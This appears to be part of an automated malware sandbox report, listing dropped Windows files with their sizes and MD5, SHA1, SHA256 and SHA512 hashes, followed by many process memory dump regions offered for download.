51a1ac8668b78f92710d1053b2276b48c2bc7ea9e459d1dd27e661bd8c0015b0df58bbc672e5d04e5306d4cf95f4e490f9878005bb62f7631e1cda8bd090c31d

Download Submit
C:\ProgramData\HostData\logs.uce

Filesize
343B

MD5
5a2812b775b17bc721ec808fe46cccdc

SHA1
b186895e093bffa131a3a7f936d75c8314f7ae2f

SHA256
72e122375917d4465af3bcd15d2dc5e0f6cb96a3a2f1fa5681d4fd512de79bba

SHA512
8693113b17a106f73cc3563dc8894d65a6a215d5de72547bf64791b04f734749c34b242a0c87651d1374eb30938ec134ce120fe4fb15292dffa44b294c9afce7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
6a8599519be3e00d5bcc5903556001d4

SHA1
88292c7fc504fa65e971940d4585d1f1ff4903dd

SHA256
132d41170c35a076194c0d9e419f3c441142b05de709d32ee3e62591318ff585

SHA512
2334194dd242c9f668eae904f2bb15ba0c7a8ba3efcf375167aab4cbed7dd79f27e1b7fecac32de5f86d86c21d4a9ae9d41b1024aab4644e4fefd38535206124

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
342776c95c9bbafb7d64117a995540c1

SHA1
57c94c2e864c06261e457dffe4daa2dd2a63b23a

SHA256
822c6587d3f9fe30b42f0a63ba19dfe472a8ac0150f5fa7ad9f21d32d6df94ad

SHA512
4dabc731d4b2e47d2c6e57d475112de0f6a4465d271c09c699faa363e286663227429444983c75cb1cf316d40d130750335709887dc3fb25731fbafd48ce7c30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
2c481f96815b04b3db04ad5082eb5f77

SHA1
1f98b16276c7ba7b406247f23dae13f4879e28f6

SHA256
1f816a87e14ac4111c2605af3813645a620d7aad53a11a5de6c0471d7987bbf5

SHA512
0ba876e6b1489bd55df6b28a3f37cd7dc1df9f69ca4a04aa9d9709fca5e45deb85f0eee7e78a95934d6b4cff4c1d3219872809f71741482f0cdcc6bc6b113139

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
2c481f96815b04b3db04ad5082eb5f77

SHA1
1f98b16276c7ba7b406247f23dae13f4879e28f6

SHA256
1f816a87e14ac4111c2605af3813645a620d7aad53a11a5de6c0471d7987bbf5

SHA512
0ba876e6b1489bd55df6b28a3f37cd7dc1df9f69ca4a04aa9d9709fca5e45deb85f0eee7e78a95934d6b4cff4c1d3219872809f71741482f0cdcc6bc6b113139

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4la1j4t5.cfs.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/100-285-0x0000000071120000-0x000000007116C000-memory.dmp

Filesize
304KB

Download
memory/100-304-0x0000000005330000-0x0000000005340000-memory.dmp

Filesize
64KB

Download
memory/100-201-0x0000000005330000-0x0000000005340000-memory.dmp

Filesize
64KB

Download
memory/100-309-0x000000007FD60000-0x000000007FD70000-memory.dmp

Filesize
64KB

Download
memory/1452-196-0x0000000000E80000-0x0000000000E90000-memory.dmp

Filesize
64KB

Download
memory/1452-254-0x0000000071120000-0x000000007116C000-memory.dmp

Filesize
304KB

Download
memory/1452-305-0x000000007F5A0000-0x000000007F5B0000-memory.dmp

Filesize
64KB

Download
memory/1452-250-0x0000000000E80000-0x0000000000E90000-memory.dmp

Filesize
64KB

Download
memory/1452-197-0x0000000000E80000-0x0000000000E90000-memory.dmp

Filesize
64KB

Download
memory/2160-284-0x0000000071120000-0x000000007116C000-memory.dmp

Filesize
304KB

Download
memory/2160-200-0x0000000002410000-0x0000000002420000-memory.dmp

Filesize
64KB

Download
memory/2160-253-0x0000000002410000-0x0000000002420000-memory.dmp

Filesize
64KB

Download
memory/2160-308-0x000000007F4F0000-0x000000007F500000-memory.dmp

Filesize
64KB

Download
memory/4088-307-0x000000007EEC0000-0x000000007EED0000-memory.dmp

Filesize
64KB

Download
memory/4088-252-0x0000000005080000-0x0000000005090000-memory.dmp

Filesize
64KB

Download
memory/4088-274-0x0000000071120000-0x000000007116C000-memory.dmp

Filesize
304KB

Download
memory/4088-249-0x0000000005080000-0x0000000005090000-memory.dmp

Filesize
64KB

Download
memory/4088-202-0x0000000005080000-0x0000000005090000-memory.dmp

Filesize
64KB

Download
memory/4364-329-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/4364-323-0x00000000013D0000-0x00000000013F0000-memory.dmp

Filesize
128KB

Download
memory/4364-330-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/4364-334-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/4364-333-0x0000000002EF0000-0x0000000002F10000-memory.dmp

Filesize
128KB

Download
memory/4364-328-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/4364-327-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/4364-326-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/4364-332-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/4364-325-0x0000000002ED0000-0x0000000002EF0000-memory.dmp

Filesize
128KB

Download
memory/4364-331-0x0000000002EF0000-0x0000000002F10000-memory.dmp

Filesize
128KB

Download
memory/4428-317-0x00000000073C0000-0x00000000073D0000-memory.dmp

Filesize
64KB

Download
memory/4428-192-0x00000000006A0000-0x00000000006B6000-memory.dmp

Filesize
88KB

Download
memory/4428-195-0x00000000073C0000-0x00000000073D0000-memory.dmp

Filesize
64KB

Download
memory/4512-139-0x0000000007720000-0x00000000077B2000-memory.dmp

Filesize
584KB

Download
memory/4512-133-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/4512-180-0x0000000007A00000-0x0000000007A10000-memory.dmp

Filesize
64KB

Download
memory/4512-138-0x0000000007BF0000-0x0000000008194000-memory.dmp

Filesize
5.6MB

Download
memory/4512-140-0x0000000007A00000-0x0000000007A10000-memory.dmp

Filesize
64KB

Download
memory/4512-141-0x0000000005270000-0x000000000527A000-memory.dmp

Filesize
40KB

Download
memory/4512-142-0x00000000077C0000-0x0000000007826000-memory.dmp

Filesize
408KB

Download
memory/4552-146-0x00000000055C0000-0x00000000055D0000-memory.dmp

Filesize
64KB

Download
memory/4552-183-0x0000000007FF0000-0x000000000800A000-memory.dmp

Filesize
104KB

Download
memory/4552-145-0x00000000055C0000-0x00000000055D0000-memory.dmp

Filesize
64KB

Download
memory/4552-184-0x0000000007F40000-0x0000000007F48000-memory.dmp

Filesize
32KB

Download
memory/4552-147-0x0000000005AE0000-0x0000000005B02000-memory.dmp

Filesize
136KB

Download
memory/4552-144-0x0000000005C00000-0x0000000006228000-memory.dmp

Filesize
6.2MB

Download
memory/4552-143-0x00000000033C0000-0x00000000033F6000-memory.dmp

Filesize
216KB

Download
memory/4552-153-0x0000000005B80000-0x0000000005BE6000-memory.dmp

Filesize
408KB

Download
memory/4552-160-0x0000000006F70000-0x0000000006FA2000-memory.dmp

Filesize
200KB

Download
memory/4552-182-0x0000000007F00000-0x0000000007F0E000-memory.dmp

Filesize
56KB

Download
memory/4552-161-0x00000000707C0000-0x000000007080C000-memory.dmp

Filesize
304KB

Download
memory/4552-159-0x00000000055C0000-0x00000000055D0000-memory.dmp

Filesize
64KB

Download
memory/4552-179-0x0000000007F50000-0x0000000007FE6000-memory.dmp

Filesize
600KB

Download
memory/4552-158-0x00000000069B0000-0x00000000069CE000-memory.dmp

Filesize
120KB

Download
memory/4552-171-0x0000000006F50000-0x0000000006F6E000-memory.dmp

Filesize
120KB

Download
memory/4552-172-0x0000000008370000-0x00000000089EA000-memory.dmp

Filesize
6.5MB

Download
memory/4552-175-0x0000000007D30000-0x0000000007D3A000-memory.dmp

Filesize
40KB

Download
memory/4552-174-0x0000000007060000-0x000000000707A000-memory.dmp

Filesize
104KB

Download
memory/4552-173-0x000000007EF60000-0x000000007EF70000-memory.dmp

Filesize
64KB

Download
memory/4560-198-0x0000000002620000-0x0000000002630000-memory.dmp

Filesize
64KB

Download
memory/4560-199-0x0000000002620000-0x0000000002630000-memory.dmp

Filesize
64KB

Download
memory/4560-251-0x0000000002620000-0x0000000002630000-memory.dmp

Filesize
64KB

Download
memory/4560-255-0x0000000071120000-0x000000007116C000-memory.dmp

Filesize
304KB

Download
memory/4560-306-0x000000007F2E0000-0x000000007F2F0000-memory.dmp

Filesize
64KB

Download